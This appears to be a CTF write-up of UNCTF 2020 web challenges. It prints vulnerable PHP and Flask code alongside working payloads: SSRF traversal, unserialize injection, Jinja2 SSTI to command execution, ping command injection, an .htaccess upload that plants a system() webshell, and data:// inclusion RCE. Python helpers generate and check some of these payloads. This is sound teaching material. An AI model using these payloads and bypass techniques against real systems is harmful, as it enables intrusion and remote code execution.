Date: 2020-11-07 to 2020-11-14

Source: UNCTF

easy_ssrf

<?php
echo'<center><strong>welc0me to 2020UNCTF!!</strong></center>';
highlight_file(__FILE__);
$url = $_GET['url'];
if(preg_match('/unctf\.com/',$url)){
    if(!preg_match('/php|file|zip|bzip|zlib|base|data/i',$url)){
        $url=file_get_contents($url);
        echo($url);
    } else {
        echo('error!!');
    }
}else{
    echo("error");
}
?>

payload:

?url=unctf.com%../../../../../flag

Hint: URL syntax, for example what characters such as % and # do.

Why it works: the first regex only requires the substring unctf.com to appear somewhere in url, and the second only blocks wrapper keywords (php, file, zip, ...), not a plain filesystem path. %.. is not a valid percent-escape, so it survives URL decoding as a literal %, and file_get_contents() then opens a relative path. PHP runs plain paths through expand_filepath(), which collapses the .. components textually before the file is opened, so the unctf.com%.. prefix does not need to exist as a directory and the path reduces to /flag.

babyeval

<?php
// the flag is in flag.php
if(isset($_GET['a'])){
    if(preg_match('/\(.*\)/', $_GET['a']))
        die('hacker!!!');
    ob_start(function($data){
             if (strpos($data, 'flag') !== false)
             return 'ByeBye hacker';
             return false;
             });
    eval($_GET['a']);
} else {
    highlight_file(__FILE__);
}
?>

payload:

?a=echo `cat flag.php | base64`

payload2:

?a=include 'php://filter/read/convert.base64-encode/resource=./flag.php'

Why it works: /\(.*\)/ only rejects input containing an opening parenthesis followed later by a closing one, so ordinary function calls are out, but the backtick operator (shell_exec) and include need no parentheses. The ob_start() callback replaces the whole output buffer with "ByeBye hacker" as soon as the literal string flag appears in it, which is why both payloads base64-encode the file before it reaches the buffer. (The canonical filter syntax is php://filter/read=convert.base64-encode/resource=...; the extra read/ segment is treated as an unknown filter, which produces a warning but does not stop the stream.)

easyunserialize

<?php
error_reporting(0);
highlight_file(__FILE__);

class a
{
    public $uname;
    public $password;
    public function __construct($uname,$password)
    {
        $this->uname=$uname;
        $this->password=$password;
    }
    public function __wakeup()
    {
        if($this->password==='easy')
        {
            include('flag.php');
            echo $flag;
        }
        else
        {
            echo 'wrong password';
        }
    }
}

function filter($string){
    return str_replace('challenge','easychallenge',$string);
}

$uname=$_GET[1];
$password=1;
$ser=filter(serialize(new a($uname,$password)));
$test=unserialize($ser);
?>

payload:

?1=challengechallengechallengechallengechallengechallengechallengechallenge";s:8:"password";s:4:"easy";}111

Hint: serialized-string escape.

Why it works: the object is serialized with password fixed to i:1, and the filter runs on the serialized text, after the length prefix of the uname string has already been written. Every challenge grows to easychallenge (+4 bytes), but s:N: still states the old length, so unserialize() stops reading the uname string 4 bytes early per replacement and parses whatever follows as the next property. The injected tail ";s:8:"password";s:4:"easy";} is 29 bytes and 8 replacements free 32 bytes, so eight copies of challenge plus three filler characters (the 111) line up exactly: the declared length 104 covers precisely the eight easychallenge copies, password is then read from the injected tail, and the original ";s:8:"password";i:1;} becomes trailing data that unserialize() ignores.
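The length arithmetic above as an added Python helper (example code, not part of the original writeup): it reproduces serialize() for this class and the str_replace() filter, derives the repetition count and filler from the replacement growth instead of counting by hand, and checks the result with a small parser for the subset of PHP's format the challenge uses (O, s, i, b). The serializer and parser are this example's own code, not PHP's, and assume ASCII input.

```python
import math

KEYWORD, REPLACEMENT = "challenge", "easychallenge"
# Tail that closes the uname string, overrides password, and closes the object.
INJECT = '";s:8:"password";s:4:"easy";}'


def php_serialize_a(uname: str, password: int) -> str:
    """Mimic serialize(new a($uname, $password)) for class a (string uname, int password)."""
    return 'O:1:"a":2:{s:5:"uname";s:%d:"%s";s:8:"password";i:%d;}' % (len(uname), uname, password)


def php_filter(s: str) -> str:
    """The challenge's filter(): str_replace('challenge', 'easychallenge', $string)."""
    return s.replace(KEYWORD, REPLACEMENT)


def build_payload(inject: str = INJECT) -> str:
    """Enough keyword copies that the declared length swallows exactly the grown copies,
    plus filler after the closing brace for the bytes the growth overshoots."""
    growth = len(REPLACEMENT) - len(KEYWORD)          # +4 bytes per replacement
    reps = math.ceil(len(inject) / growth)            # 29 bytes -> 8 copies
    filler = reps * growth - len(inject)              # 32 - 29 = 3 -> "111"
    return KEYWORD * reps + inject + "1" * filler


def php_unserialize(data: str):
    """Minimal parser for O:, s:, i:, b: (ASCII only). Trailing bytes are ignored, as PHP does."""
    pos = 0

    def parse():
        nonlocal pos
        kind = data[pos]
        if kind in "ib":
            end = data.index(";", pos)
            value = int(data[pos + 2:end])
            pos = end + 1
            return bool(value) if kind == "b" else value
        if kind == "s":
            colon = data.index(":", pos + 2)
            length = int(data[pos + 2:colon])
            start = colon + 2                         # skip ':"'
            value = data[start:start + length]        # read exactly `length` bytes, no more
            if data[start + length:start + length + 2] != '";':
                raise ValueError("string not terminated where its length said")
            pos = start + length + 2
            return value
        if kind == "O":
            colon = data.index(":", pos + 2)
            name_len = int(data[pos + 2:colon])
            name = data[colon + 2:colon + 2 + name_len]
            after_name = colon + 2 + name_len + 2     # skip '":'
            brace = data.index("{", after_name)
            count = int(data[after_name:brace - 1])
            pos = brace + 1
            props = {}
            for _ in range(count):
                key = parse()
                props[key] = parse()
            if data[pos] != "}":
                raise ValueError("object not closed")
            pos += 1
            return name, props
        raise ValueError("unsupported type " + kind)

    return parse()


def exploit_password(uname: str):
    """What __wakeup() would see in $this->password for a given ?1= value."""
    ser = php_filter(php_serialize_a(uname, 1))
    return php_unserialize(ser)[1]["password"]
```

build_payload() returns exactly the string used in the payload above; exploit_password() on it yields "easy", while a harmless name such as "bob" still yields the integer 1.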

ezphp

<?php
show_source(__FILE__);
$username  = "admin";
$password  = "password";
include("flag.php");
$data = isset($_POST['data'])? $_POST['data']: "" ;
$data_unserialize = unserialize($data);
if ($data_unserialize['username']==$username&&$data_unserialize['password']==$password){
    echo $flag;
}else{
    echo "username or password error!";
}

payload:

POST:data=a:2:{s:8:"username";b:1;s:8:"password";b:1;}

Hint: PHP loose comparison.

Why it works: == is a loose comparison, and when one operand is a boolean the other is converted to boolean first. "admin" and "password" are non-empty strings other than "0", so they become true, and true == true holds. b:1 is serialized true, so both checks pass without knowing either value. (The older trick of i:0, relying on 0 == "admin", only works before PHP 8, where non-numeric strings stopped comparing equal to 0; the boolean version works on PHP 8 as well.)

easyflask

The challenge starts with login and registration pages. Just register admin/admin; back on the home page it then reveals a secret_route_you_do_not_know page.

That page asks you to guess: ?guess=

There is SSTI here (before finding it I had also spent a long time brute-forcing the SECRET_KEY).

The SSTI filters these characters:

[ ] ' " _

The filtered underscore is bypassed with |attr(request.args.cla): Jinja2's attr filter does a getattr() with whatever string the GET parameter cla carries, so no attribute name containing underscores ever appears in the template itself.

The filtered single and double quotes are bypassed the same way, through request.args.a, with the string passed as a GET parameter.

The filtered square brackets [] are bypassed with .pop(N) or __getitem__. Pay close attention to how Python accesses these subclasses, attributes and dict keys, it is very easy to get wrong (I spent ages on exactly this).

The chain used:

().__class__.__bases__[0].__subclasses__()[166]  (warnings.catch_warnings)  .__init__.__globals__['__builtins__']['eval']("__import__('os').popen('cat flag.txt').read()")

payload:

{{(((()|attr(request.args.cla)|attr(request.args.bas)|list).pop(0))|attr(request.args.sub)()).pop(166)|attr(request.args.ini)|attr(request.args.glo)|attr(request.args.geti)(request.args.bui)|attr(request.args.geti)(request.args.ii)(request.args.hh)}}&cla=__class__&bas=__bases__&sub=__subclasses__&ini=__init__&glo=__globals__&bui=__builtins__&hh=__import__('os').popen('cat flag.txt').read()&ii=eval&geti=__getitem__

The index 166 is specific to this target's Python version and loaded modules; on another interpreter warnings.catch_warnings sits at a different position in __subclasses__(), so enumerate the list first instead of reusing the number.
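The chain above in plain Python, added here as an example (not part of the original writeup and not the challenge's code): it locates warnings.catch_warnings in the subclass list at runtime instead of hard-coding 166, walks the same __init__.__globals__['__builtins__']['eval'] path with getattr() the way |attr() does, and emits the bracket-, quote- and underscore-free template together with the GET parameters that smuggle the names. The gadget name and parameter names are taken from the payload above; the interpreter it runs on is whichever one executes it, so the index it finds will differ from 166.

```python
import warnings  # makes sure warnings.catch_warnings is loaded; a Flask app has it loaded anyway

GADGET = "catch_warnings"


def find_subclass(name: str):
    """(index, class) of the first object subclass called `name`, walking the same
    ().__class__.__bases__[0].__subclasses__() list the template does."""
    for index, cls in enumerate(().__class__.__bases__[0].__subclasses__()):
        if cls.__name__ == name:
            return index, cls
    raise LookupError("no subclass named %s on this interpreter" % name)


def builtins_via(cls) -> dict:
    """cls.__init__.__globals__['__builtins__'], fetched with getattr() like |attr() does."""
    module_globals = getattr(getattr(cls, "__init__"), "__globals__")
    b = module_globals["__builtins__"]
    return b if isinstance(b, dict) else vars(b)   # a dict outside __main__, a module inside it


def run_gadget(expr: str):
    """The whole chain: subclass -> __init__.__globals__ -> builtins -> eval(expr)."""
    _, cls = find_subclass(GADGET)
    return builtins_via(cls)["eval"](expr)


def build_request(index: int, command: str):
    """Template expression free of [ ] ' " _ plus the GET parameters that carry the names."""
    template = (
        "{{(((()|attr(request.args.cla)|attr(request.args.bas)|list).pop(0))"
        "|attr(request.args.sub)()).pop(%d)|attr(request.args.ini)|attr(request.args.glo)"
        "|attr(request.args.geti)(request.args.bui)|attr(request.args.geti)(request.args.ii)"
        "(request.args.hh)}}" % index
    )
    params = {
        "cla": "__class__", "bas": "__bases__", "sub": "__subclasses__",
        "ini": "__init__", "glo": "__globals__", "geti": "__getitem__",
        "bui": "__builtins__", "ii": "eval",
        "hh": "__import__('os').popen(%r).read()" % command,
    }
    return template, params


def banned_chars_present(template: str) -> bool:
    """The challenge's character filter applied to the template part of the request."""
    return any(c in template for c in "[]'\"_")
```

run_gadget() is deliberately fed harmless expressions here; the point is that the eval reached through the gadget is the real builtins eval, and that the index passed to build_request() comes from find_subclass() rather than from a number copied out of another writeup.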

A few articles (I actually went through N of them):

https://www.mi1k7ea.com/2019/05/31/Python沙箱逃逸小结/

https://www.secpulse.com/archives/115367.html

UN's_online_tools

It opens on the classic online tool: it pings a given IP.

The first idea is always to fuzz which characters are banned. Testing with Burp, the following were blocked:

$
&
*
{
]
;
'
>
space

Next, use the pipe to run ls: |ls, which lists index.php.

Then bypass the space with %09 (a tab); cat is filtered, so break the word up with a backslash. The shell drops an unquoted backslash, so ca\t runs cat while the regex never sees the word cat.

Read the source: |ca\t%09index.php

<!doctype html>
<html>
    <head>
        <meta charset='utf-8'>
        <title>Login</title>
        <link rel="stylesheet" href="style.css">
    </head>
    <body>
        <div class="box">
            <h2>PING</h2>
            <h4>其他功能待开发</h4>
            <form action="./index.php" method="get">
                <div class="inputBox">
                    <input type="text" name="url" required="">
                    <label>Url</label>
                </div>
                <input type="submit" name="GO" value="GO">
            </form>
            <br>
            <?php
            if (isset($_GET['url'])){
                $ip=$_GET['url'];
                if(preg_match("/(;|'| |>|]|&| |\\$|\\|rev|more|tailf|head|nl|tail|tac|cat|rm|cp|mv|\*|\{)/i", $ip)){
                    die("<strong><center>非法字符</center></strong>");
                }
                if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
                    die("<strong><center>非法字符</center></strong>");
                }
                $a = shell_exec("ping -c 4 ".$ip);
                echo($a);
            }else{
                echo "<script>alert('欢迎来到UN`s online tools 如果师傅觉得题目不适合您,可以出门左拐')</script>";
            }
            ?>
        </div>
    </body>
</html>

Now the filter is clear. flag is blocked by /.*f.*l.*a.*g.*/ (the four letters in that order anywhere in the input), so name the file with ? wildcards instead and let the shell glob it.

payload:

|ca\t%09/f???

The flag shows up in the response.

One caveat on the source as transcribed above: in a double-quoted PHP string, \\| becomes the regex \|, a literal pipe, which would have blocked the | used here. Since |ls did work during the contest, the listing is probably not byte-exact.
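The filter and what the shell then does with the surviving payload, as an added Python re-creation (example code, not part of the original writeup). The token list is typed from the index.php above except for the ambiguous \\| token, which is left out on the assumption that the pipe really was allowed; the directory listing is constructed.

```python
import fnmatch
import re
from urllib.parse import unquote

# Token list from the preg_match() in index.php (case-insensitive), minus the ambiguous "\\|".
SYMBOLS = re.compile(r"(;|'| |>|]|&|\$|rev|more|tailf|head|nl|tail|tac|cat|rm|cp|mv|\*|\{)", re.I)
# Second check: the letters f, l, a, g in that order anywhere in the input.
FLAG_WORD = re.compile(r".*f.*l.*a.*g.*")

ROOT_LISTING = ["/bin", "/etc", "/flag", "/home", "/root", "/tmp", "/var"]  # constructed


def filter_blocks(ip: str) -> bool:
    """True when index.php would die() on this $_GET['url']."""
    return bool(SYMBOLS.search(ip) or FLAG_WORD.search(ip))


def shell_unescape(word: str) -> str:
    """An unquoted backslash makes sh take the next character literally: ca\\t is the word cat."""
    return re.sub(r"\\(.)", r"\1", word)


def simulate(query_value: str, listing=ROOT_LISTING):
    """Decode the ?url= value, run the filter, and show what lands after the pipe:
    (program, files its glob arguments expand to), or None if the request is rejected."""
    ip = unquote(query_value)                 # %09 becomes a real tab, which the filter does not list
    if filter_blocks(ip):
        return None
    command = "ping -c 4 " + ip               # the shell_exec() string
    if "|" not in command:
        return None                           # nothing injected
    words = command.split("|", 1)[1].split()  # sh splits on blanks, tab included
    argv = [shell_unescape(w) for w in words]
    files = sorted(f for w in argv[1:] for f in fnmatch.filter(listing, w))
    return argv[0], files
```

simulate("|ca\\t%09/f???") comes back as ("cat", ["/flag"]), while the same request with a space, the unbroken word cat, or the literal name /flag is rejected before anything runs.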

easy_upload

File upload. The file name is filtered, only image files can be uploaded, but the stored name is kept unchanged, so think .htaccess.

Upload .htaccess:

POST /index.php HTTP/1.1
Host: 164003d7-9b83-484e-af2a-c400e62a742e.node3.hackingfor.fun
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------3533994738563832533554341631
Content-Length: 378
Origin: http://f73adc3f-29f5-41ba-b49b-4f2850b0cb13.node3.hackingfor.fun
Connection: close
Referer: http://f73adc3f-29f5-41ba-b49b-4f2850b0cb13.node3.hackingfor.fun/
Upgrade-Insecure-Requests: 1

-----------------------------3533994738563832533554341631
Content-Disposition: form-data; name="fileUpload"; filename=".htaccess"
Content-Type: image/jpeg

SetHandler application/x-httpd-p\
hp

-----------------------------3533994738563832533554341631
Content-Disposition: form-data; name="upload"

submit
-----------------------------3533994738563832533554341631--

The file contents are filtered too: perl|pyth|ph|auto|curl|base|\|>|rm|ryby|openssl|war|lua|msf|xter|telnet in contents!

The SetHandler line above dodges the ph check by splitting php across two lines with a trailing backslash: Apache joins a line ending in \ with the next one when it reads the file, so the directive it applies is SetHandler application/x-httpd-php. The shell below uses the <?= short echo tag for the same reason: <?php would contain ph.

POST /index.php HTTP/1.1
Host: 164003d7-9b83-484e-af2a-c400e62a742e.node3.hackingfor.fun
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------3533994738563832533554341631
Content-Length: 359
Origin: http://f73adc3f-29f5-41ba-b49b-4f2850b0cb13.node3.hackingfor.fun
Connection: close
Referer: http://f73adc3f-29f5-41ba-b49b-4f2850b0cb13.node3.hackingfor.fun/
Upgrade-Insecure-Requests: 1

-----------------------------3533994738563832533554341631
Content-Disposition: form-data; name="fileUpload"; filename="a.jpg"
Content-Type: image/jpeg

<?=system("cat /flag");

-----------------------------3533994738563832533554341631
Content-Disposition: form-data; name="upload"

submit
-----------------------------3533994738563832533554341631--

Then just request a.jpg!
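The two pieces of that bypass side by side, as an added Python example (not part of the original writeup): the content blacklist as stated above, assumed case-insensitive, run over the plain and the split .htaccess and over the shell, and the backslash continuation Apache's config reader applies, which turns the split line back into the directive. The exact whitespace handling on continuation lines is an assumption and does not matter here since hp starts at column 0.

```python
import re

# Content blacklist as stated above; assumed case-insensitive like the other filters on this page.
CONTENT_BLACKLIST = re.compile(
    r"perl|pyth|ph|auto|curl|base|\||>|rm|ryby|openssl|war|lua|msf|xter|telnet", re.I)

HTACCESS_PLAIN = "SetHandler application/x-httpd-php\n"           # rejected: contains "ph"
HTACCESS_SPLIT = "SetHandler application/x-httpd-p\\\nhp\n"       # what was uploaded
SHELL = '<?=system("cat /flag");\n'                               # a.jpg; "<?php" would contain "ph"


def content_blocked(data: str) -> bool:
    """True if the upload handler would reject this file body."""
    return CONTENT_BLACKLIST.search(data) is not None


def apache_join_continuations(text: str) -> str:
    """Apache's config reader concatenates a line ending in a backslash with the next physical
    line (assumption: leading blanks on the continuation line are dropped)."""
    return re.sub(r"\\\n[ \t]*", "", text)


def directive_apache_sees(htaccess: str) -> str:
    """The directive that actually takes effect once the file is read."""
    return apache_join_continuations(htaccess).strip()
```

The filter is a substring check on the bytes as uploaded, Apache only assembles the logical line afterwards, so the two never look at the same string.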

ezfind

I solved this one the unintended way too...

When I was completely stuck I opened Burp, loaded every fuzz payload I had, and out came the flag... I was dumbfounded.

The payload the brute force found ended in %00, so the short form is:

name=%00

Reproducing after the contest: when an array or a %00 is passed in, is_file() returns null.
Truly the best language!

L0vephp

I did not solve this during the contest because I could not find the entry point; afterwards star hinted at ?action.

First, read flag.php through the file inclusion with a filter wrapper:

php://filter/read=convert.quoted-printable-encode/resource=flag.php

flag.php only contains a fake flag plus a hint pointing to 1nD3x.php, which looks like this:

<?php 


error_reporting(0);
show_source(__FILE__);
$code=$_REQUEST['code'];

$_=array('@','\~','\^','\&','\?','\<','\>','\*','\`','\+','\-','\'','\"','\\\\','\/'); 
$__=array('eval','system','exec','shell_exec','assert','passthru','array_map','ob_start','create_function','call_user_func','call_user_func_array','array_filter','proc_open');
$blacklist1 = array_merge($_);
$blacklist2 = array_merge($__);

if (strlen($code)>16){
    die('Too long');
}

foreach ($blacklist1 as $blacklisted) { 
    if (preg_match ('/' . $blacklisted . '/m', $code)) { 
        die('WTF???'); 
    } 
} 

foreach ($blacklist2 as $blackitem) {
    if (preg_match ('/' . $blackitem . '/im', $code)) {
        die('Sry,try again');
    }
}

@eval($code);
?>

As you can see it blocks a lot of symbols and all the command-execution functions, and limits code to 16 characters. This short payload still gets you the phpinfo() page:

?code=${phpinfo()};

It reveals an important detail:

allow_url_fopen	        On      On
allow_url_include	On	On

With allow_url_include on, the data:// wrapper can be included, so execute commands through file inclusion. include needs no parentheses, include$_GET[1]; is exactly 16 characters, and the real payload lives in a second parameter that neither the blacklists nor the length check ever see:

?code=include$_GET[1];&1=data://text/plain,<?php%20system("cat%20/flag_mdnrvvldb");?>

The flag file had been renamed, which is why it was nowhere to be found at first; an ls / shows it.


I don't know anything!